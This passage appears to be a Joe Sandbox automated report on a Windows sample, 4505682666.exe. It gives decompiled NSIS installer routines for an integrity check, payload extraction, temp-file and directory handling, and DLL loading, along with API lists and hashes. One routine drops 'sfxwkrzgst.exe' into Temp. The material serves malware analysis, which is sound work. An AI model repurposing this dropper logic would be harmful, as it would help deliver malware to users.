                                  								 *_t59 =  *_t59 + _t94;
                                  								_t85 = _t85 - 1;
                                  							} while (_t85 != 0);
                                  							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                  							 *(_t94 + 0x3c) = _t60;
                                  							E00405FB2(0x42a240, _t94 + 4, 0x40);
                                  							return 0;
                                  						}
                                  						goto L29;
                                  					}
                                  					E004034AF( *0x414eb8);
                                  					if(E00403499( &_a4, 4) == 0 || _v12 != _a4) {
                                  						goto L29;
                                  					} else {
                                  						goto L28;
                                  					}
                                  				} else {
                                  					do {
                                  						_t90 = _t93;
                                  						asm("sbb eax, eax");
                                  						_t70 = ( ~( *0x42a234) & 0x00007e00) + 0x200;
                                  						if(_t93 >= _t70) {
                                  							_t90 = _t70;
                                  						}
                                  						if(E00403499(0x40ceb8, _t90) == 0) {
                                  							E00403019(1);
                                  							L29:
                                  							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                  						}
                                  						if( *0x42a234 != 0) {
                                  							if((_a4 & 0x00000002) == 0) {
                                  								E00403019(0);
                                  							}
                                  							goto L20;
                                  						}
                                  						E00405FB2( &_v44, 0x40ceb8, 0x1c);
                                  						_t77 = _v44;
                                  						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                  							_a4 = _a4 | _t77;
                                  							_t87 =  *0x414eb8; // 0x19400
                                  							 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
                                  							_t80 = _v20;
                                  							 *0x42a234 = _t87;
                                  							if(_t80 > _t93) {
                                  								goto L29;
                                  							}
                                  							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                  								_v8 = _v8 + 1;
                                  								_t93 = _t80 - 4;
                                  								if(_t90 > _t93) {
                                  									_t90 = _t93;
                                  								}
                                  								goto L20;
                                  							} else {
                                  								break;
                                  							}
                                  						}
                                  						L20:
                                  						if(_t93 <  *0x420ec4) {
                                  							_v12 = E004069C1(_v12, 0x40ceb8, _t90);
                                  						}
                                  						 *0x414eb8 =  *0x414eb8 + _t90;
                                  						_t93 = _t93 - _t90;
                                  					} while (_t93 != 0);
                                  					_t82 = 0;
                                  					goto L24;
                                  				}
                                  			}

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 0040308E
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4505682666.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
                                    • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\4505682666.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                    • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\4505682666.exe,C:\Users\user\Desktop\4505682666.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
                                  • GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\4505682666.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                  • API String ID: 2803837635-1802309480
                                  • Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                  • Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
                                  • Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                  • Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph
                                  [Control-flow graph for the function at 0x004032B4; legend: Executed, Not Executed]
                                  C-Code - Quality: 94%
                                  			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                  				signed int _v8;
                                  				int _v12;
                                  				long _v16;
                                  				intOrPtr _v20;
                                  				short _v148;
                                  				void* _t59;
                                  				intOrPtr _t69;
                                  				long _t70;
                                  				void* _t71;
                                  				intOrPtr _t81;
                                  				intOrPtr _t86;
                                  				long _t89;
                                  				signed int _t90;
                                  				int _t91;
                                  				int _t92;
                                  				intOrPtr _t93;
                                  				void* _t94;
                                  				void* _t95;
                                  
                                  				_t90 = _a16;
                                  				_t86 = _a12;
                                  				_v12 = _t90;
                                  				if(_t86 == 0) {
                                  					_v12 = 0x8000;
                                  				}
                                  				_v8 = _v8 & 0x00000000;
                                  				_t81 = _t86;
                                  				if(_t86 == 0) {
                                  					_t81 = 0x418ec0;
                                  				}
                                  				_t56 = _a4;
                                  				if(_a4 >= 0) {
                                  					E004034AF( *0x42a278 + _t56);
                                  				}
                                  				if(E00403499( &_a16, 4) == 0) {
                                  					L33:
                                  					_push(0xfffffffd);
                                  					goto L34;
                                  				} else {
                                  					if((_a19 & 0x00000080) == 0) {
                                  						if(_t86 == 0) {
                                  							while(_a16 > 0) {
                                  								_t91 = _v12;
                                  								if(_a16 < _t91) {
                                  									_t91 = _a16;
                                  								}
                                  								if(E00403499(0x414ec0, _t91) == 0) {
                                  									goto L33;
                                  								} else {
                                  									if(E004060A9(_a8, 0x414ec0, _t91) == 0) {
                                  										L28:
                                  										_push(0xfffffffe);
                                  										L34:
                                  										_pop(_t59);
                                  										return _t59;
                                  									}
                                  									_v8 = _v8 + _t91;
                                  									_a16 = _a16 - _t91;
                                  									continue;
                                  								}
                                  							}
                                  							L43:
                                  							return _v8;
                                  						}
                                  						if(_a16 < _t90) {
                                  							_t90 = _a16;
                                  						}
                                  						if(E00403499(_t86, _t90) != 0) {
                                  							_v8 = _t90;
                                  							goto L43;
                                  						} else {
                                  							goto L33;
                                  						}
                                  					}
                                  					_v16 = GetTickCount();
                                  					E00406A2F(0x40ce30);
                                  					_t13 =  &_a16;
                                  					 *_t13 = _a16 & 0x7fffffff;
                                  					_a4 = _a16;
                                  					if( *_t13 <= 0) {
                                  						goto L43;
                                  					} else {
                                  						goto L9;
                                  					}
                                  					while(1) {
                                  						L9:
                                  						_t92 = 0x4000;
                                  						if(_a16 < 0x4000) {
                                  							_t92 = _a16;
                                  						}
                                  						if(E00403499(0x414ec0, _t92) == 0) {
                                  							goto L33;
                                  						}
                                  						_a16 = _a16 - _t92;
                                  						 *0x40ce48 = 0x414ec0;
                                  						 *0x40ce4c = _t92;
                                  						while(1) {
                                  							 *0x40ce50 = _t81;
                                  							 *0x40ce54 = _v12; // executed
                                  							_t69 = E00406A4F(0x40ce30); // executed
                                  							_v20 = _t69;
                                  							if(_t69 < 0) {
                                  								break;
                                  							}
                                  							_t93 =  *0x40ce50; // 0x418ec0
                                  							_t94 = _t93 - _t81;
                                  							_t70 = GetTickCount();
                                  							_t89 = _t70;
                                  							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
                                  								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                  								_t95 = _t95 + 0xc;
                                  								E00405569(0,  &_v148);
                                  								_v16 = _t89;
                                  							}
                                  							if(_t94 == 0) {
                                  								if(_a16 > 0) {
                                  									goto L9;
                                  								}
                                  								goto L43;
                                  							} else {
                                  								if(_a12 != 0) {
                                  									_v8 = _v8 + _t94;
                                  									_v12 = _v12 - _t94;
                                  									_t81 =  *0x40ce50; // 0x418ec0
                                  									L23:
                                  									if(_v20 != 1) {
                                  										continue;
                                  									}
                                  									goto L43;
                                  								}
                                  								_t71 = E004060A9(_a8, _t81, _t94); // executed
                                  								if(_t71 == 0) {
                                  									goto L28;
                                  								}
                                  								_v8 = _v8 + _t94;
                                  								goto L23;
                                  							}
                                  						}
                                  						_push(0xfffffffc);
                                  						goto L34;
                                  					}
                                  					goto L33;
                                  				}
                                  			}






















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CountTick$wsprintf
                                  • String ID: ... %d%%$G8@$MZx
                                  • API String ID: 551687249-258887703
                                  • Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                  • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                                  • Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                  • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 516 40176f-401794 call 402da6 call 405e4d 521 401796-40179c call 406507 516->521 522 40179e-4017b0 call 406507 call 405dd6 lstrcatW 516->522 527 4017b5-4017b6 call 40678e 521->527 522->527 531 4017bb-4017bf 527->531 532 4017c1-4017cb call 40683d 531->532 533 4017f2-4017f5 531->533 540 4017dd-4017ef 532->540 541 4017cd-4017db CompareFileTime 532->541 534 4017f7-4017f8 call 405fd2 533->534 535 4017fd-401819 call 405ff7 533->535 534->535 543 40181b-40181e 535->543 544 40188d-4018b6 call 405569 call 4032b4 535->544 540->533 541->540 545 401820-40185e call 406507 * 2 call 406544 call 406507 call 405b67 543->545 546 40186f-401879 call 405569 543->546 556 4018b8-4018bc 544->556 557 4018be-4018ca SetFileTime 544->557 545->531 578 401864-401865 545->578 558 401882-401888 546->558 556->557 560 4018d0-4018db FindCloseChangeNotification 556->560 557->560 561 402c33 558->561 563 4018e1-4018e4 560->563 564 402c2a-402c2d 560->564 565 402c35-402c39 561->565 568 4018e6-4018f7 call 406544 lstrcatW 563->568 569 4018f9-4018fc call 406544 563->569 564->561 575 401901-4023a2 call 405b67 568->575 569->575 575->564 575->565 578->558 580 401867-401868 578->580 580->546
                                  C-Code - Quality: 75%
                                  			E0040176F(FILETIME* __ebx, void* __eflags) {
                                  				void* __esi;
                                  				void* _t35;
                                  				void* _t43;
                                  				void* _t45;
                                  				FILETIME* _t51;
                                  				FILETIME* _t64;
                                  				void* _t66;
                                  				signed int _t72;
                                  				FILETIME* _t73;
                                  				FILETIME* _t77;
                                  				signed int _t79;
                                  				WCHAR* _t81;
                                  				void* _t83;
                                  				void* _t84;
                                  				void* _t86;
                                  
                                  				_t77 = __ebx;
                                  				 *(_t86 - 8) = E00402DA6(0x31);
                                  				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                  				_t35 = E00405E4D( *(_t86 - 8));
                                  				_push( *(_t86 - 8));
                                  				_t81 = L"C:\\Users\\hardz\\AppData\\Local";
                                  				if(_t35 == 0) {
                                  					lstrcatW(E00405DD6(E00406507(_t81, 0x436000)), ??);
                                  				} else {
                                  					E00406507();
                                  				}
                                  				E0040678E(_t81);
                                  				while(1) {
                                  					__eflags =  *(_t86 + 8) - 3;
                                  					if( *(_t86 + 8) >= 3) {
                                  						_t66 = E0040683D(_t81);
                                  						_t79 = 0;
                                  						__eflags = _t66 - _t77;
                                  						if(_t66 != _t77) {
                                  							_t73 = _t66 + 0x14;
                                  							__eflags = _t73;
                                  							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                  						}
                                  						asm("sbb eax, eax");
                                  						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                  						__eflags = _t72;
                                  						 *(_t86 + 8) = _t72;
                                  					}
                                  					__eflags =  *(_t86 + 8) - _t77;
                                  					if( *(_t86 + 8) == _t77) {
                                  						E00405FD2(_t81);
                                  					}
                                  					__eflags =  *(_t86 + 8) - 1;
                                  					_t43 = E00405FF7(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                  					__eflags = _t43 - 0xffffffff;
                                  					 *(_t86 - 0x38) = _t43;
                                  					if(_t43 != 0xffffffff) {
                                  						break;
                                  					}
                                  					__eflags =  *(_t86 + 8) - _t77;
                                  					if( *(_t86 + 8) != _t77) {
                                  						E00405569(0xffffffe2,  *(_t86 - 8));
                                  						__eflags =  *(_t86 + 8) - 2;
                                  						if(__eflags == 0) {
                                  							 *((intOrPtr*)(_t86 - 4)) = 1;
                                  						}
                                  						L31:
                                  						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
                                  						__eflags =  *0x42a2a8;
                                  						goto L32;
                                  					} else {
                                  						E00406507(0x40b5c8, _t83);
                                  						E00406507(_t83, _t81);
                                  						E00406544(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                                  						E00406507(_t83, 0x40b5c8);
                                  						_t64 = E00405B67("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                                  						__eflags = _t64;
                                  						if(_t64 == 0) {
                                  							continue;
                                  						} else {
                                  							__eflags = _t64 == 1;
                                  							if(_t64 == 1) {
                                  								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
                                  								L32:
                                  								_t51 = 0;
                                  								__eflags = 0;
                                  							} else {
                                  								_push(_t81);
                                  								_push(0xfffffffa);
                                  								E00405569();
                                  								L29:
                                  								_t51 = 0x7fffffff;
                                  							}
                                  						}
                                  					}
                                  					L33:
                                  					return _t51;
                                  				}
                                  				E00405569(0xffffffea,  *(_t86 - 8));
                                  				 *0x42a2d4 =  *0x42a2d4 + 1;
                                  				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                  				 *0x42a2d4 =  *0x42a2d4 - 1;
                                  				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                  				_t84 = _t45;
                                  				if( *(_t86 - 0x24) != 0xffffffff) {
                                  					L22:
                                  					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                  				} else {
                                  					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                  					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                  						goto L22;
                                  					}
                                  				}
                                  				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                  				__eflags = _t84 - _t77;
                                  				if(_t84 >= _t77) {
                                  					goto L31;
                                  				} else {
                                  					__eflags = _t84 - 0xfffffffe;
                                  					if(_t84 != 0xfffffffe) {
                                  						E00406544(_t77, _t81, _t84, _t81, 0xffffffee);
                                  					} else {
                                  						E00406544(_t77, _t81, _t84, _t81, 0xffffffe9);
                                  						lstrcatW(_t81,  *(_t86 - 8));
                                  					}
                                  					_push(0x200010);
                                  					_push(_t81);
                                  					E00405B67();
                                  					goto L29;
                                  				}
                                  				goto L33;
                                  			}



















                                  APIs
                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                  • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,00000000,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00436000,?,?,00000031), ref: 004017D5
                                    • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                    • Part of subcall function 00405569: lstrlenW.KERNEL32(004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                    • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                    • Part of subcall function 00405569: lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
                                    • Part of subcall function 00405569: SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
                                    • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                    • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                    • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
                                  • API String ID: 1941528284-3945006646
                                  • Opcode ID: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
                                  • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                                  • Opcode Fuzzy Hash: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
                                  • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 582 406864-406884 GetSystemDirectoryW 583 406886 582->583 584 406888-40688a 582->584 583->584 585 40689b-40689d 584->585 586 40688c-406895 584->586 588 40689e-4068d1 wsprintfW LoadLibraryExW 585->588 586->585 587 406897-406899 586->587 587->588
                                  C-Code - Quality: 100%
                                  			E00406864(intOrPtr _a4) {
                                  				short _v576;
                                  				signed int _t13;
                                  				struct HINSTANCE__* _t17;
                                  				signed int _t19;
                                  				void* _t24;
                                  
                                  				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                  				if(_t13 > 0x104) {
                                  					_t13 = 0;
                                  				}
                                  				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                  					_t19 = 1;
                                  				} else {
                                  					_t19 = 0;
                                  				}
                                  				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                  				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                  				return _t17;
                                  			}









                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                  • wsprintfW.USER32 ref: 004068B6
                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                  • String ID: %s%S.dll$UXTHEME$\
                                  • API String ID: 2200240437-1946221925
                                  • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                  • Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
                                  • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                  • Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 589 405a38-405a83 CreateDirectoryW 590 405a85-405a87 589->590 591 405a89-405a96 GetLastError 589->591 592 405ab0-405ab2 590->592 591->592 593 405a98-405aac SetFileSecurityW 591->593 593->590 594 405aae GetLastError 593->594 594->592
                                  C-Code - Quality: 100%
                                  			E00405A38(WCHAR* _a4) {
                                  				struct _SECURITY_ATTRIBUTES _v16;
                                  				struct _SECURITY_DESCRIPTOR _v36;
                                  				int _t22;
                                  				long _t23;
                                  
                                  				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                  				_v36.Owner = 0x4083f8;
                                  				_v36.Group = 0x4083f8;
                                  				_v36.Sacl = _v36.Sacl & 0x00000000;
                                  				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                  				_v16.lpSecurityDescriptor =  &_v36;
                                  				_v36.Revision = 1;
                                  				_v36.Control = 4;
                                  				_v36.Dacl = 0x4083e8;
                                  				_v16.nLength = 0xc;
                                  				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                  				if(_t22 != 0) {
                                  					L1:
                                  					return 0;
                                  				}
                                  				_t23 = GetLastError();
                                  				if(_t23 == 0xb7) {
                                  					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                  						goto L1;
                                  					}
                                  					return GetLastError();
                                  				}
                                  				return _t23;
                                  			}








                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                  • GetLastError.KERNEL32 ref: 00405A8F
                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
                                  • GetLastError.KERNEL32 ref: 00405AAE
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 3449924974-3916508600
                                  • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                  • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                                  • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                  • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 595 406026-406032 596 406033-406067 GetTickCount GetTempFileNameW 595->596 597 406076-406078 596->597 598 406069-40606b 596->598 599 406070-406073 597->599 598->596 600 40606d 598->600 600->599
                                  C-Code - Quality: 100%
                                  			E00406026(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                  				intOrPtr _v8;
                                  				short _v12;
                                  				short _t12;
                                  				intOrPtr _t13;
                                  				signed int _t14;
                                  				WCHAR* _t17;
                                  				signed int _t19;
                                  				signed short _t23;
                                  				WCHAR* _t26;
                                  
                                  				_t26 = _a4;
                                  				_t23 = 0x64;
                                  				while(1) {
                                  					_t12 =  *L"nsa"; // 0x73006e
                                  					_t23 = _t23 - 1;
                                  					_v12 = _t12;
                                  					_t13 =  *0x40a57c; // 0x61
                                  					_v8 = _t13;
                                  					_t14 = GetTickCount();
                                  					_t19 = 0x1a;
                                  					_v8 = _v8 + _t14 % _t19;
                                  					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                  					if(_t17 != 0) {
                                  						break;
                                  					}
                                  					if(_t23 != 0) {
                                  						continue;
                                  					} else {
                                  						 *_t26 =  *_t26 & _t23;
                                  					}
                                  					L4:
                                  					return _t17;
                                  				}
                                  				_t17 = _t26;
                                  				goto L4;
                                  			}













                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00406044
                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                  • API String ID: 1716503409-1968954121
                                  • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                  • Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
                                  • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                  • Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 684 405ede-405ef9 call 406507 call 405e81 689 405efb-405efd 684->689 690 405eff-405f0c call 40678e 684->690 691 405f57-405f59 689->691 694 405f1c-405f20 690->694 695 405f0e-405f14 690->695 697 405f36-405f3f lstrlenW 694->697 695->689 696 405f16-405f1a 695->696 696->689 696->694 698 405f41-405f55 call 405dd6 GetFileAttributesW 697->698 699 405f22-405f29 call 40683d 697->699 698->691 704 405f30-405f31 call 405e22 699->704 705 405f2b-405f2e 699->705 704->697 705->689 705->704
                                  C-Code - Quality: 53%
                                  			E00405EDE(void* __eflags, intOrPtr _a4) {
                                  				int _t11;
                                  				signed char* _t12;
                                  				long _t16;
                                  				intOrPtr _t18;
